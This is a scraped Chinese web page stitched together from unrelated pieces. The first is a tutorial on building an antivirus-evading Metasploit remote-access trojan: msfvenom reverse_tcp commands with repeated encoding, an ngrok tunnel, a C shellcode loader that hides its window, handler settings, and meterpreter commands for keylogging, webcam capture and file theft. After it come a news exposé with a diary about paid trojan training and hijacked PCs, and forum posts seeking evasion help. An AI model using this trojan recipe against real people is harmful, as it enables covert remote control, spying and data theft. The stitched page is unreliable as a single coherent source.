Metasploit实验：制作免杀payload+对任意“外网”主机的远控 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
Metasploit实验：制作免杀payload+对任意“外网”主机的远控
共952473人围观
，发现 45 个不明物体
*本文只做技术交流之用，技术无罪，希望大家知法懂法，更要守法
我发一个文件，你电脑就被我控制了，我可以拍照摄像下载文件，杀毒软件也不管用！这是怎么做到的呢？
这个问题的实现需要拆分成下面三个模块
内网穿透到外网
制作免杀木马后门
Metasploit控制客户机
制作payload，攻击，映射端口
192.168.1.130
Metasploit
制作payload
任意公网地址
&内网穿透到外网
首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。
这里我用的是linux64bit
接下来在上面的网站自行注册申请，然后登陆。
然后申请免费隧道，选择TCP协议，自定义远程端口，本地IP地址就是kali的IP地址，端口自定义，但不要冲突。
这里请记住隧道id，以及自定义远程端口，kali本机端口
将下载的客户端放置于指定目录，cd到目录，在命令行运行ngrok
./sunny clientid 隧道id
这样就完成了端口映射，它能将外网端口接收到的数据返回到本机kali的指定端口。内网穿透的用途很多，下面给出说明，这里不再赘述。
https://ngrok.com/docs
&制作免杀木马后门
首先，在kali中用msfvenom生成一个payload
msfvenom -p&windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c
上面命令中，-p选择指定payload，–e选择制定编码器（不同编码器免杀效果也有不同，部分编码器应对火绒等杀软效果显著）， -i 编码次数，-b 去多余/坏字符，lhost是你申请的ngrok服务器地址 lport是自定义的远程端口，-f 生成指定格式。
我这里选择生成基于C语言的数组，当然你也可以用以下命令直接得到exe木马，但这样免杀效果会打折扣，经笔者测试多次，重复编码12次后免杀效果非常强大！
msfvenom -p&windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f exe & haya.exe
然后复制buf数组
在win7下用VC6.0对下面代码进行编译，得到木马。
#include &stdio.h&
#pragmacomment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
((void(*)(void))&buf)();
&Metasploit控制客户机
切到Kali，使用Metasploit进行监听。
设置监听攻击模块，监听载荷，IP（kali本机），端口（ngrok里自定义的本地端口），然后exp。
use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
当客户机执行木马后，得到一个meterpreter，可以进行的操作你懂的哈哈。
list一些meterpreter的常用命令。
Download（upload）
下载（上传）指定目录文件
列出当前系统进程
消灭指定uid系统进程
keyscan_start
开始键盘记录软件
webcam_snap
screenshot
关于隐藏木马，加陌生壳，自启动，文件包含，进程转移等各种姿势加强木马强度就需要大家自行测试了&
通入上述步骤得到的木马经过笔者测试可以通过360，腾讯管家，Windows defender，小红伞等杀毒软件的查杀。动态免杀中，对于360，如果exe没有放在C盘或者U盘运行就可以做到动态免杀，仅仅会在拍照等特敏感操作会有提示，其他操作全程不报毒，defender和腾讯管家就更弱了，拍照也不会有任何提示。
后记：通过此次实验，更加了解了信息安全的重要性。免杀和杀软是永远的对头，但是两者相互抗衡其实加速了安全行业的发展，没有绝对安全的系统，攻防相互对立却又彼此依存，攻防应合一。
文章参考：
*本文作者：haya，转载请注明FreeBuf.COM
在我没有得到认可之前，我会一直变强.
试了一下，并不免杀
这个是静态免杀，杀毒软件主动查杀不到，但是当运行时连接msf时 其会被360等监控到，无法动态免杀，想请教下您是怎样动态免杀的。。。急用。
不出意外的话，明天360就能杀了
必须您当前尚未登录。
必须（保密）
这家伙太懒，还未填写个人描述！
关注我们 分享每日精选文章揭秘肉鸡出售木马制作教学培训黑幕 - 维维软件园
揭秘肉鸡出售木马制作教学培训黑幕
来源：不详作者：不详时间： 13:27:00(0)
&&&&&&& 揭秘肉鸡出售木马制作教学培训黑幕
　　在金钱诱惑下，每天都有数不清的人怀着各种各样的目地，前赴后继地踏入到网络地下世界。Kevin的7天黑客日记里，让我们看到了互联网&黑社会&触目惊心的事实：许多人以偷窥为乐，交流着各种木马入侵手段，把肉鸡(被黑客控制的他人电脑)卖给其他人，甚至还有所谓的&师傅&，制作简单易懂的教程等。
　　Day1 萌芽
　　从大学里开始，那些黑客、红客、木马、病毒之类的信息就特别的能够吸引到我。最近又听说寄生在灰鸽子上下游这个产业链已达到了1亿元的规模，这让我真的大吃了一惊。想想自己现在拼命每个月才赚那么几千块钱，真是有点嫉妒。
　　Day2 寻找 自学
　　趁着下午上班不忙的空闲，我溜达到灰鸽子贴吧中，里面有一个帖子，标题是&90元收徒弟，教鸽子配置，内外网上线方法，免杀，抓肉鸡，网马配置等&信息。按帖子的提示，我加入了一个以VISTA SP1为名字的QQ群。
　　当我顺利通过验证进入该群后发现QQ群里人还真的有不少，130多名成员中有30多人在线，大家正在热火朝天地讨论有关双开、肉鸡、代理、扫描等话题。不少人的名字前面还有&【徒】&的字样，我想这大概是付了钱的标记。
　　在这个QQ群的共享空间中有40几种相关的教程和工具提供下载，我也下载了，不过大部分都是加密的压缩文件，需要解压密码才能够查看使用的。
　　Day3 联络 付费
　　昨天我搞了一个晚上，看了不少网站，也试着用了一些软件，却一无所获。那些入侵、扫描的教程和文章说起来都很简单，但是我按照教程里说的去操作却死活得不到相同的结果，真是有些郁闷。看来还是得交钱拜个师傅才能真正的学得会。
　　今天我回到了VISTA SP1群，找到了管理员Paul，他就是大家说的师傅。当我以菜鸟名义谦虚地向Paul请教如何使用灰鸽子及木马等方面的问题时，他却显得并不是很耐烦，只是说自己拥有多年的黑客木马经验，并能够编写黑客工具，并且只要拜他为师，就可以免费提供各种黑客工具。
　　Day4 拜师 初试
　　今天我又忙碌了一天，但我一直惦记着师傅要教我的事情。回到家匆匆扒了几口饭，我就上网去找师傅了。他说已经收到我交的学费，让我在名字前面加上了&【徒】&字以便和其他人区别。随后师傅给了我QQ群里的共享空间里文件的解压密码，让我先从他制作的&内网鸽子上线教程&动画教程开始学起。虽然是非常傻瓜式的操作，但也许是自己真的太笨了，连灰鸽子远程控制软件都打不开，狂晕。
　　Day5 讲解
　　今天晚上，在师傅的QQ远程控制教学指导下，我顺利地将灰鸽子服务器软件测试调试上线好。随后师傅嘱咐我按照&免杀教程&，将生成的这个服务器软件进行免杀处理，以便躲过杀毒软件。完成了灰鸽子服务器软件调试和免杀，我按照师傅的提示，开始学习下一步操作&&抓肉鸡。但是在看了自动抓肉鸡的教程后，我却发现缺少了一个重要的工具。一位好心的师兄告诉我这个工具必须向师傅花钱购买，&大概50元吧。&
　　Day6 小成 偷窥
　　按照相关教程，我把灰鸽子服务端配置好，再一次做了免杀。并根据网络上找到的教程依次进行端口扫描，弱口令密码扫描。经过3个多小时的等待，终于我的软件中提示已经找到了14台目标电脑。其中第一台肉鸡位于四川绵阳，我找到这台电脑中的图片文件夹。&甘肃图片?&立即下载看看，原来是一位MM在景点的留影啊，呵呵。继续，继续看看还有没有其他的。
　　Day7 犹豫 放弃
　　今天下午，我把这几天的经历炫耀地告诉了表姐，结果被她老人家好好骂了一顿。可是我才入门，就这样放弃吗?回家后看了看全球头号黑客凯文&米特尼克的报道，我发现自己只是一个可耻的偷窥者。好吧，我还是放弃这一切吧，这并不是一次很光彩的经历。晚上我又一次打开了灰鸽子，删除了肉鸡上的服务器端软件。我决定告别这一切，改邪归正，明天醒来，我还是决定做个好人。
　　记者调查 木马教学极度猖狂
　　从Kevin的日记及记者随后调查情况来看，木马教学不仅仅只是QQ上一对一的辅导，已经呈现多样化、专业化的态势。
　　实际上，记者也联系上了几位专门教授木马及贩卖木马工具的人。从其中一位与记者聊天过程及所发的帖子中的内容来看，他应该是某黑客论坛的版主级以上的人物。他所售卖的黑客工具&&黑色&&远程控制修正免杀版，从演示动画上分析，功能大致与灰鸽子相当，不过另外加了DDOS的攻击功能。他向记者开价为100元、300元、400元不等。
　　除此之外，记者还加入了一个名为&黑客爱好者乐园&的QQ群(群号码为)，该群的主持人声称每晚8点在某语音聊天室进行语音教学，内容包括灰鸽子、双开3389、网游木马、高级木马、刷Q、入侵、&黑人&等。而记者在晚上几次进入该聊天室，的确发现这个群的主持人在进行语音教学。
　　记者在QQ群中待了几天，看到不分昼夜、不分地域，时刻有人炫耀自己所窃取的肉鸡上的文件，熟悉的黑客之间会讨论是否要搞破坏。可是，当有新人上线来请教问题，&无私&解答者却寥寥。要想人教?要想获得强大的工具?对不起，请掏钱。50元起跳，越多越好。在这些群里，等级森严，师傅带徒弟，徒弟带徒孙，一级一级，都被金钱利益牢牢纠集在了一起。
　　如果说最早的黑客只是为了炫耀技术才入侵网站但从不搞大破坏，让技术爱好者佩服，现在这些玩木马的人，早已经用自己的行动玷污了黑客的头衔，已经毫无道德可言。
　　专家视角 法律维权仍为奢望
　　上海市信息服务行业协会顾问律师周宾卿说，理论上说，参与整个木马黑色产业链各个环节的角色都是违法的，比如那些通过教学徒如何&种木马&并收取费用的&老师&，就可被列为&教唆犯罪&一列，其行为已经形成了&共同犯罪&，其他木马设计、销赃、盗卖等参与者也都难逃其咎。
　　但之所以木马犯罪者最终被绳之以法的少之又少，是因为以现在公安等相关部门还没有对木马产业链的上下游进行完整的追踪，缺乏足够的资源也造成对产业链进行全面调查的侦查成本过高。目前相关部门只能对影响恶劣、后果严重、涉案金额巨大的少数案件进行大规模调查，并将少数主要涉案者送上法庭。至于那些盗取QQ号、破坏个人电脑数据的行为，公安部门甚至不予立案，其实在现实生活中QQ和网游账号被盗者报案而公安机关不予受理的情况，已经屡有发生。
　　造成这种现状的主要原因是虚拟财产仍无法准确被估值，司法机关很难以盗窃行为为犯罪者定罪，目前木马罪犯常被定下&非法侵入计算机信息系统罪&、&侵犯通信自由&等罪名。
　　普通用户如果想举起法律武器对木马犯罪进行防范，至少在现阶段还是奢望，过高的维权成本和法律条文对虚拟财产的界定还是暂时无法逾越的坎儿。从实际操作来说，建议用户更多采用防火墙、杀毒工具等技术手段对自己的电脑进行防护。
大家还看了：
[访问统计：]
上一篇：下一篇：免杀,有哪位高手帮我做下免杀,愿意收我做徒弟哦啊?谢谢了,真心想找个师傅,_百度知道
免杀,有哪位高手帮我做下免杀,愿意收我做徒弟哦啊?谢谢了,真心想找个师傅,
想找个免杀师傅QQ
我有更好的答案
推荐 到饭客 网络去看看，里面分享各类免杀技术及免杀工具，教程丰富，当然也有招徒弟的。
我在他那学过，技术 牛！
为您推荐：
其他类似问题
免杀的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。我有一个APK文件
谁能教我怎么做免杀。有偿 - 『悬赏问答区』
- 吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|www.52pojie.cn
后使用快捷导航没有帐号？
只需一步，快速开始
请完成以下验证码
请完成以下验证码
查看: 1561|回复: 7
我有一个APK文件
谁能教我怎么做免杀。有偿
阅读权限10
我有一个APK文件&&谁能教我怎么做免杀。不是白学的。付费
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
头像被屏蔽
提示: 作者被禁止或删除 内容自动屏蔽
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
阅读权限10
哪有啊&&我没找到
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
头像被屏蔽
提示: 作者被禁止或删除 内容自动屏蔽
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
阅读权限25
免杀没那么简单吧,&&有的话我也学, 算我一个.
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
阅读权限10
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
阅读权限10
加签名证书就免杀了吧
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
头像被屏蔽
提示: 作者被禁止或删除 内容自动屏蔽
发帖求助前要善用【】功能，那里可能会有你要找的答案；如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子分类或者标题加上【已解决】；如何回报帮助你解决问题的坛友，一个好办法就是给对方加【热心】和【CB】，加分不会扣除自己的积分，做一个热心并受欢迎的人！
免责声明：吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。
( 京ICP备号 | 京公网安备 87号 )
Powered by Discuz!
Comsenz Inc.}